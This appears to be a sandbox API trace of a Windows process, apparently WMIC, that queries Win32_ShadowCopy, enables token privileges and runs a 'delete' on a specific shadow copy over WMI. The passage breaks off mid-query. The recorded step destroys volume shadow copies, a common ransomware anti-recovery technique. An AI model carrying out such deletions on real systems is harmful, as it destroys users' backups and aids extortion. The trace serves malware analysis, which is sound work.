This=0x1d904e0, wszName="Connection", lFlags=0, pVal=0x18f9e0*(varType=0x0, wReserved1=0xff83, wReserved2=0x0, wReserved3=0x0, varVal1=0x22bd68, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x18f9e0*(varType=0xd, wReserved1=0xff83, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d909c0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0102.009] free (_Block=0x49cbe0) [0102.009] IUnknown:QueryInterface (in: This=0x1d909c0, riid=0xff7c7360*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x18f9d0 | out: ppvObject=0x18f9d0*=0x1d909c0) returned 0x0 [0102.009] GetCurrentThreadId () returned 0x9c8 [0102.009] ??0CHString@@QEAA@XZ () returned 0x18f8f8 [0102.009] malloc (_Size=0x18) returned 0x49cbe0 [0102.009] IWbemClassObject:Get (in: This=0x1d909c0, wszName="Namespace", lFlags=0, pVal=0x18f920*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff7d738f, varVal2=0x49cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x18f920*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x49cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0102.009] free (_Block=0x49cbe0) [0102.009] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0102.009] malloc (_Size=0x16) returned 0x49cbe0 [0102.009] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0102.009] malloc (_Size=0x18) returned 0x49cae0 [0102.009] IWbemClassObject:Get (in: This=0x1d909c0, wszName="Locale", lFlags=0, pVal=0x18f920*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x25a648, varVal2=0x49cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x18f920*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x49cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0102.009] free (_Block=0x49cae0) [0102.010] lstrlenW (lpString="ms_409") returned 6 [0102.010] malloc (_Size=0xe) returned 0x49cae0 [0102.010] lstrlenW (lpString="ms_409") returned 6 [0102.010] malloc (_Size=0x18) returned 0x49cb80 [0102.010] IWbemClassObject:Get (in: This=0x1d909c0, wszName="User", lFlags=0, pVal=0x18f920*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x25a648, varVal2=0x49cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x18f920*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x25a648, varVal2=0x49cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0102.010] free (_Block=0x49cb80) [0102.010] malloc (_Size=0x18) returned 0x49cb80 [0102.010] IWbemClassObject:Get (in: This=0x1d909c0, wszName="Password", lFlags=0, pVal=0x18f920*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x25a648, varVal2=0x49cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x18f920*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x25a648, varVal2=0x49cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0102.010] free (_Block=0x49cb80) [0102.010] malloc (_Size=0x18) returned 0x49cb80 [0102.010] IWbemClassObject:Get (in: This=0x1d909c0, wszName="Server", lFlags=0, pVal=0x18f920*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x25a648, varVal2=0x49cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x18f920*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x49cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0102.010] free (_Block=0x49cb80) [0102.010] lstrlenW (lpString=".") returned 1 [0102.010] malloc (_Size=0x4) returned 0x497140 [0102.011] lstrlenW (lpString=".") returned 1 [0102.011] malloc (_Size=0x18) returned 0x49cb80 [0102.011] IWbemClassObject:Get (in: This=0x1d909c0, wszName="Authority", lFlags=0, pVal=0x18f920*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x25a648, varVal2=0x49cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x18f920*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x25a648, varVal2=0x49cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0102.011] free (_Block=0x49cb80) [0102.011] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0102.011] IUnknown:Release (This=0x1d909c0) returned 0x1 [0102.011] GetCurrentThreadId () returned 0x9c8 [0102.011] ??0CHString@@QEAA@XZ () returned 0x18f8f8 [0102.011] malloc (_Size=0x18) returned 0x49cb80 [0102.011] IWbemClassObject:Get (in: This=0x1d904e0, wszName="__RELPATH", lFlags=0, pVal=0x18f920*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x25a648, varVal2=0xd), pType=0x0, plFlavor=0x0 | out: pVal=0x18f920*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0xd), pType=0x0, plFlavor=0x0) returned 0x0 [0102.011] free (_Block=0x49cb80) [0102.011] malloc (_Size=0x18) returned 0x49cb80 [0102.012] GetCurrentThreadId () returned 0x9c8 [0102.012] ??0CHString@@QEAA@XZ () returned 0x18f778 [0102.012] ??0CHString@@QEAA@PEBG@Z () returned 0x18f790 [0102.012] ??0CHString@@QEAA@AEBV0@@Z () returned 0x18f720 [0102.012] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0102.012] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x49d020 [0102.012] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b [0102.012] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x18f6e0 [0102.012] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x18f728 [0102.012] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x18f790 [0102.012] ??1CHString@@QEAA@XZ () returned 0x1ade3801 [0102.012] ??1CHString@@QEAA@XZ () returned 0x1ade3801 [0102.012] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x18f6e8 [0102.012] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x18f720 [0102.012] ??1CHString@@QEAA@XZ () returned 0x1 [0102.012] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x49d090 [0102.013] ?Find@CHString@@QEBAHPEBG@Z () returned 0xa [0102.013] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x18f6e0 [0102.013] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x18f728 [0102.013] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x18f790 [0102.013] ??1CHString@@QEAA@XZ () returned 0x1ade3801 [0102.013] ??1CHString@@QEAA@XZ () returned 0x1ade3801 [0102.013] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x18f6e8 [0102.013] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x18f720 [0102.013] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0102.013] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7fef4af4820 [0102.013] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0102.013] malloc (_Size=0x18) returned 0x49cba0 [0102.013] malloc (_Size=0x18) returned 0x49cc00 [0102.013] malloc (_Size=0x18) returned 0x49cc20 [0102.013] malloc (_Size=0x18) returned 0x49cc40 [0102.013] malloc (_Size=0x18) returned 0x49cc60 [0102.013] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0102.013] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0102.014] malloc (_Size=0x18) returned 0x49cc80 [0102.014] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0102.014] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0102.014] malloc (_Size=0x18) returned 0x49cca0 [0102.014] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0102.014] SysStringLen (param_1="\"") returned 0x1 [0102.014] free (_Block=0x49cc80) [0102.014] free (_Block=0x49cc60) [0102.014] free (_Block=0x49cc40) [0102.014] free (_Block=0x49cc20) [0102.014] free (_Block=0x49cc00) [0102.015] free (_Block=0x49cba0) [0102.015] IWbemServices:GetObject (in: This=0x1d83b28, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x18f768*=0x0, ppCallResult=0x0 | out: ppObject=0x18f768*=0x1d90a50, ppCallResult=0x0) returned 0x0 [0102.016] malloc (_Size=0x18) returned 0x49cba0 [0102.016] IWbemClassObject:Get (in: This=0x1d90a50, wszName="Text", lFlags=0, pVal=0x18f7a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff832ac0, varVal2=0x18), pType=0x0, plFlavor=0x0 | out: pVal=0x18f7a0*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x254aa0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x1de030, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x18), pType=0x0, plFlavor=0x0) returned 0x0 [0102.016] free (_Block=0x49cba0) [0102.016] SafeArrayGetLBound (in: psa=0x254aa0, nDim=0x1, plLbound=0x18f780 | out: plLbound=0x18f780) returned 0x0 [0102.016] SafeArrayGetUBound (in: psa=0x254aa0, nDim=0x1, plUbound=0x18f770 | out: plUbound=0x18f770) returned 0x0 [0102.017] SafeArrayGetElement (in: psa=0x254aa0, rgIndices=0x18f764, pv=0x18f7b8 | out: pv=0x18f7b8) returned 0x0 [0102.017] malloc (_Size=0x18) returned 0x49cba0 [0102.017] malloc (_Size=0x18) returned 0x49cc00 [0102.017] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0102.017] free (_Block=0x49cba0) [0102.017] IUnknown:Release (This=0x1d90a50) returned 0x0 [0102.017] free (_Block=0x49cca0) [0102.017] ??1CHString@@QEAA@XZ () returned 0x1ade3801 [0102.017] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0102.017] free (_Block=0x49cb80) [0102.017] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0102.017] lstrlenW (lpString="Shadow copy management.") returned 23 [0102.017] malloc (_Size=0x30) returned 0x4985c0 [0102.017] lstrlenW (lpString="Shadow copy management.") returned 23 [0102.018] free (_Block=0x49cc00) [0102.018] IUnknown:Release (This=0x1d904e0) returned 0x0 [0102.018] free (_Block=0x49cbc0) [0102.018] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0102.018] lstrlenW (lpString="PATH") returned 4 [0102.018] lstrlenW (lpString="where") returned 5 [0102.018] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0102.018] lstrlenW (lpString="WHERE") returned 5 [0102.018] lstrlenW (lpString="where") returned 5 [0102.018] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0102.018] lstrlenW (lpString="/") returned 1 [0102.018] lstrlenW (lpString="ID='{7199C78C-6563-4398-B813-4A3F86995AEC}'") returned 43 [0102.035] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{7199C78C-6563-4398-B813-4A3F86995AEC}'", cchCount1=43, lpString2="/", cchCount2=1) returned 3 [0102.035] lstrlenW (lpString="-") returned 1 [0102.035] lstrlenW (lpString="ID='{7199C78C-6563-4398-B813-4A3F86995AEC}'") returned 43 [0102.035] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{7199C78C-6563-4398-B813-4A3F86995AEC}'", cchCount1=43, lpString2="-", cchCount2=1) returned 3 [0102.035] lstrlenW (lpString="ID='{7199C78C-6563-4398-B813-4A3F86995AEC}'") returned 43 [0102.035] malloc (_Size=0x58) returned 0x49d020 [0102.036] lstrlenW (lpString="ID='{7199C78C-6563-4398-B813-4A3F86995AEC}'") returned 43 [0102.036] lstrlenW (lpString="/") returned 1 [0102.036] lstrlenW (lpString="delete") returned 6 [0102.036] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0102.036] lstrlenW (lpString="-") returned 1 [0102.036] lstrlenW (lpString="delete") returned 6 [0102.036] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0102.036] lstrlenW (lpString="delete") returned 6 [0102.036] malloc (_Size=0xe) returned 0x49cbc0 [0102.036] lstrlenW (lpString="delete") returned 6 [0102.036] lstrlenW (lpString="GET") returned 3 [0102.036] lstrlenW (lpString="delete") returned 6 [0102.036] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0102.036] lstrlenW (lpString="LIST") returned 4 [0102.036] lstrlenW (lpString="delete") returned 6 [0102.036] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0102.036] lstrlenW (lpString="SET") returned 3 [0102.036] lstrlenW (lpString="delete") returned 6 [0102.036] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0102.036] lstrlenW (lpString="CREATE") returned 6 [0102.036] lstrlenW (lpString="delete") returned 6 [0102.036] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0102.036] lstrlenW (lpString="CALL") returned 4 [0102.036] lstrlenW (lpString="delete") returned 6 [0102.036] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0102.036] lstrlenW (lpString="ASSOC") returned 5 [0102.036] lstrlenW (lpString="delete") returned 6 [0102.036] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0102.036] lstrlenW (lpString="DELETE") returned 6 [0102.037] lstrlenW (lpString="delete") returned 6 [0102.037] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0102.037] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0102.037] malloc (_Size=0x3e) returned 0x49d080 [0102.037] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0102.037] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0102.037] malloc (_Size=0x18) returned 0x49cc00 [0102.037] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*" [0102.037] lstrlenW (lpString="FROM") returned 4 [0102.037] lstrlenW (lpString="*") returned 1 [0102.037] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0102.037] malloc (_Size=0x18) returned 0x49cb80 [0102.037] free (_Block=0x49cc00) [0102.037] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3b00760009 | out: _String=0x0, _Context=0x3b00760009) returned="from" [0102.037] lstrlenW (lpString="FROM") returned 4 [0102.037] lstrlenW (lpString="from") returned 4 [0102.037] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0102.037] malloc (_Size=0x18) returned 0x49cc00 [0102.037] free (_Block=0x49cb80) [0102.037] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3c00760009 | out: _String=0x0, _Context=0x3c00760009) returned="Win32_ShadowCopy" [0102.037] malloc (_Size=0x18) returned 0x49cb80 [0102.038] free (_Block=0x49cc00) [0102.038] free (_Block=0x49d080) [0102.038] free (_Block=0x49cb80) [0102.038] lstrlenW (lpString="SET") returned 3 [0102.038] lstrlenW (lpString="delete") returned 6 [0102.038] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0102.038] lstrlenW (lpString="CREATE") returned 6 [0102.038] lstrlenW (lpString="delete") returned 6 [0102.038] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0102.038] free (_Block=0x49cef0) [0102.038] malloc (_Size=0x8) returned 0x496f20 [0102.038] lstrlenW (lpString="GET") returned 3 [0102.038] lstrlenW (lpString="delete") returned 6 [0102.038] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0102.038] lstrlenW (lpString="LIST") returned 4 [0102.038] lstrlenW (lpString="delete") returned 6 [0102.038] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0102.038] lstrlenW (lpString="ASSOC") returned 5 [0102.038] lstrlenW (lpString="delete") returned 6 [0102.038] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0102.038] WbemLocator:IUnknown:AddRef (This=0x1d71390) returned 0x3 [0102.038] free (_Block=0x2bdfb0) [0102.038] lstrlenW (lpString="") returned 0 [0102.038] lstrlenW (lpString="XDUWTFONO") returned 9 [0102.039] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0102.039] lstrlenW (lpString="XDUWTFONO") returned 9 [0102.039] malloc (_Size=0x14) returned 0x49cb80 [0102.039] lstrlenW (lpString="XDUWTFONO") returned 9 [0102.039] GetCurrentThreadId () returned 0x9c8 [0102.039] GetCurrentProcess () returned 0xffffffffffffffff [0102.039] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x18fb40 | out: TokenHandle=0x18fb40*=0x27c) returned 1 [0102.039] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18fb38 | out: TokenInformation=0x0, ReturnLength=0x18fb38) returned 0 [0102.039] malloc (_Size=0x118) returned 0x49d080 [0102.039] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x49d080, TokenInformationLength=0x118, ReturnLength=0x18fb38 | out: TokenInformation=0x49d080, ReturnLength=0x18fb38) returned 1 [0102.039] AdjustTokenPrivileges (in: TokenHandle=0x27c, DisableAllPrivileges=0, NewState=0x49d080*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=-69322087, Attributes=0x36b), (Luid.LowPart=0x0, Luid.HighPart=4837104, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0102.039] free (_Block=0x49d080) [0102.039] CloseHandle (hObject=0x27c) returned 1 [0102.039] lstrlenW (lpString="GET") returned 3 [0102.039] lstrlenW (lpString="delete") returned 6 [0102.039] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0102.039] lstrlenW (lpString="LIST") returned 4 [0102.040] lstrlenW (lpString="delete") returned 6 [0102.040] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0102.040] lstrlenW (lpString="SET") returned 3 [0102.040] lstrlenW (lpString="delete") returned 6 [0102.040] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0102.040] lstrlenW (lpString="CALL") returned 4 [0102.040] lstrlenW (lpString="delete") returned 6 [0102.040] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0102.040] lstrlenW (lpString="ASSOC") returned 5 [0102.040] lstrlenW (lpString="delete") returned 6 [0102.040] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0102.040] lstrlenW (lpString="CREATE") returned 6 [0102.040] lstrlenW (lpString="delete") returned 6 [0102.040] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0102.040] lstrlenW (lpString="DELETE") returned 6 [0102.040] lstrlenW (lpString="delete") returned 6 [0102.040] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0102.040] malloc (_Size=0x18) returned 0x49cc00 [0102.040] lstrlenA (lpString="") returned 0 [0102.040] malloc (_Size=0x2) returned 0x2bdfb0 [0102.040] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff7c314c, cbMultiByte=-1, lpWideCharStr=0x2bdfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0102.040] free (_Block=0x2bdfb0) [0102.040] malloc (_Size=0x18) returned 0x49cca0 [0102.040] lstrlenA (lpString="") returned 0 [0102.041] malloc (_Size=0x2) returned 0x2bdfb0 [0102.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff7c314c, cbMultiByte=-1, lpWideCharStr=0x2bdfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0102.041] free (_Block=0x2bdfb0) [0102.041] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0102.041] malloc (_Size=0x3e) returned 0x49d080 [0102.041] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0102.041] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0102.041] malloc (_Size=0x18) returned 0x49cba0 [0102.041] free (_Block=0x49cca0) [0102.041] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3f006e0007 | out: _String=0x0, _Context=0x3f006e0007) returned="*" [0102.041] lstrlenW (lpString="FROM") returned 4 [0102.041] lstrlenW (lpString="*") returned 1 [0102.041] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0102.041] malloc (_Size=0x18) returned 0x49cca0 [0102.041] free (_Block=0x49cba0) [0102.041] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x40006e0007 | out: _String=0x0, _Context=0x40006e0007) returned="from" [0102.041] lstrlenW (lpString="FROM") returned 4 [0102.041] lstrlenW (lpString="from") returned 4 [0102.041] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0102.041] malloc (_Size=0x18) returned 0x49cba0 [0102.041] free (_Block=0x49cca0) [0102.041] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x41006e0007 | out: _String=0x0, _Context=0x41006e0007) returned="Win32_ShadowCopy" [0102.041] malloc (_Size=0x18) returned 0x49cca0 [0102.042] free (_Block=0x49cba0) [0102.042] free (_Block=0x49d080) [0102.042] malloc (_Size=0x18) returned 0x49cba0 [0102.042] malloc (_Size=0x18) returned 0x49cc20 [0102.042] malloc (_Size=0x18) returned 0x49cc40 [0102.042] malloc (_Size=0x18) returned 0x49cc60 [0102.042] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0102.042] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0102.042] malloc (_Size=0x18) returned 0x49cc80 [0102.042] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0102.042] SysStringLen (param_1=" WHERE ") returned 0x7 [0102.042] malloc (_Size=0x18) returned 0x49ccc0 [0102.042] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ") returned 0x25 [0102.042] SysStringLen (param_1="ID='{7199C78C-6563-4398-B813-4A3F86995AEC}'") returned 0x2b [0102.042] free (_Block=0x49cc00) [0102.043] free (_Block=0x49cc80) [0102.043] free (_Block=0x49cc60) [0102.043] free (_Block=0x49cc40) [0102.043] free (_Block=0x49cc20) [0102.043] free (_Block=0x49cba0) [0102.043] ??0CHString@@QEAA@XZ () returned 0x18fab0 [0102.043] GetCurrentThreadId () returned 0x9c8 [0102.043] malloc (_Size=0x18) returned 0x49cba0 [0102.043] malloc (_Size=0x18) returned 0x49cc20 [0102.043] malloc (_Size=0x18) returned 0x49cc40 [0102.043] malloc (_Size=0x18) returned 0x49cc60 [0102.043] malloc (_Size=0x18) returned 0x49cc80 [0102.043] SysStringLen (param_1="\\\\") returned 0x2 [0102.043] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0102.043] malloc (_Size=0x18) returned 0x49cc00 [0102.043] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0102.043] SysStringLen (param_1="\\") returned 0x1 [0102.044] malloc (_Size=0x18) returned 0x49cce0 [0102.044] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0102.044] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0102.044] free (_Block=0x49cc00) [0102.044] free (_Block=0x49cc80) [0102.044] free (_Block=0x49cc60) [0102.044] free (_Block=0x49cc40) [0102.044] free (_Block=0x49cc20) [0102.044] free (_Block=0x49cba0) [0102.044] malloc (_Size=0x18) returned 0x49cba0 [0102.044] malloc (_Size=0x18) returned 0x49cc20 [0102.044] malloc (_Size=0x18) returned 0x49cc40 [0102.044] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1d71390, strNetworkResource="\\\\XDUWTFONO\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff8329d0 | out: ppNamespace=0xff8329d0*=0x1d83c18) returned 0x0 [0102.049] free (_Block=0x49cc40) [0102.049] free (_Block=0x49cc20) [0102.049] free (_Block=0x49cba0) [0102.049] CoSetProxyBlanket (pProxy=0x1d83c18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0102.050] free (_Block=0x49cce0) [0102.050] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0102.050] ??0CHString@@QEAA@XZ () returned 0x18fa00 [0102.050] GetCurrentThreadId () returned 0x9c8 [0102.050] malloc (_Size=0x18) returned 0x49cce0 [0102.050] lstrlenA (lpString="") returned 0 [0102.050] malloc (_Size=0x2) returned 0x2bdfb0 [0102.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff7c314c, cbMultiByte=-1, lpWideCharStr=0x2bdfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0102.050] free (_Block=0x2bdfb0) [0102.050] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy 